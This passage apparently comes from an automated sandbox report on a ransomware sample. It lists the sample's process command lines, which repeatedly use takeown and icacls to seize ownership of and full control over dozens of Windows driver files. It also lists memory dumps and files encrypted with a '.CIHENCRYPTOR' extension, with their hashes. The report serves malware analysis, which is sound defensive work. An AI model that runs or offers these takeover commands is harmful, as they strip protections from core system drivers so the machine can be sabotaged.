"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\tcpip.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\tcpipreg.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\tape.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\tdi.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\tdpipe.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\tdi.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\tdpipe.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\tdx.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\tdtcp.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\tdx.sys /grant "Admin:F"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5254698641626100822-17822577821108865617208495359811934740846430294325406599"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\tdtcp.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\tssecsrv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1621972821-186423536-976347298-55815338-13948156341237883302-18084894311537270689"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\termdd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\termdd.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\TsUsbGD.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\terminpt.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\tsusbhub.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\terminpt.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\tunnel.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\tunnel.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\udfs.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\UAGP35.SYS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\umbus.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\umbus.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\udfs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\umpass.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\umpass.sys /grant "Admin:F"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-18527294761008946761-13354187-1962718761-2016503921823899208-2041297686589303772"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbehci.sys && icacls C:\Windows\System32\drivers\usbehci.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\USBCAMD2.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\usb8023.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbhub.sys && icacls C:\Windows\System32\drivers\usbhub.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\usbccgp.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbohci.sys && icacls C:\Windows\System32\drivers\usbohci.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\usbd.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\usbcir.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\usb8023.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\usbccgp.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbport.sys && icacls C:\Windows\System32\drivers\usbport.sys /grant "%username%:F" && exit
Network
Files
memory/2068-0-0x000000013FA80000-0x000000013FAEE000-memory.dmp
memory/2068-1-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp
memory/2068-2-0x000000001BA30000-0x000000001BAB0000-memory.dmp
C:\Users\Admin\Desktop\MountFind.htm.CIHENCRYPTOR
| MD5 | 4945cbc2f409897d542893fc4035f15a |
| SHA1 | 346a4b1af3d1e868074faad1c7e015bf590956e9 |
| SHA256 | 2e9f8c3035259edf1ee9f7728c35e70cd25c4d206f3ebb369bd8b40dbdabc583 |
| SHA512 | 15c09be55975b7685f227d0c773e645ef9d78b85408cb3b75403635ec11080d42cf190ecfc8784bd4e560c19dfaefd4a2acf53fa69c0d33e5bed396baad72f9e |
C:\Users\Admin\Desktop\TestProtect.txt.CIHENCRYPTOR
| MD5 | c20f13136299814d71994a27067301d2 |
| SHA1 | d2800507b1fa996743807cbb119a7bf6b3d39385 |
| SHA256 | 2dcc93af37fb15f3077dea4c6cd79ee57d2896738b722df2471a57e80d110f89 |
| SHA512 | 165fb33b84c82035db639e34d0f4d3bcf9527ba73c5735c85ad013873ba6ad11044800383a3524740c9095081e59172e3b43837795c2231bb293fa15f89126c3 |
C:\Users\Admin\Desktop\¶4½♪¶₧ø∩◘╠╤ě9ÿïń¶▄▲½ε5ž®µ3¥╥▐ö♥½►ÆåÂ▌◘♀ž▼╚šńå╔¾¼↕ø☻œ¾45¼é█◘½•ó◄▄č₧ÿ█9¤®▀Σ—╩■•ń™2▄♫ě♦◘œ—9♠♥╠♂☼↑♫▌ÿ■╔▀
| MD5 | 9e1e5883c74742a497cf5c272ccd2321 |
| SHA1 | 2cf33e34d08b8e17743a60352baffef4b6f02dee |
| SHA256 | ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a |
| SHA512 | f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b |
C:\Users\Admin\AppData\Local\Temp\wallpaper.bmp
| MD5 | 18e0b500eebdd3f868af5388baa7ff79 |
| SHA1 | 49a5acb14e59a9e2fb370425bffcda9d00d84fb6 |
| SHA256 | 9a1dbb8a87da13e11ac40e6d77981cac8698aa289b87f0db8ee5240f6cbd31df |
| SHA512 | 15415fe9e2a384e2190a3d24ab34614f871cc8666e333add5fb4b5029464c1dd7f09bb917908d7e62fbfe27fc0b13ef1f6ddd9d8a5b077c4e4729f06ff407dc4 |
memory/2068-136-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp
memory/2068-137-0x000000001BA30000-0x000000001BAB0000-memory.dmp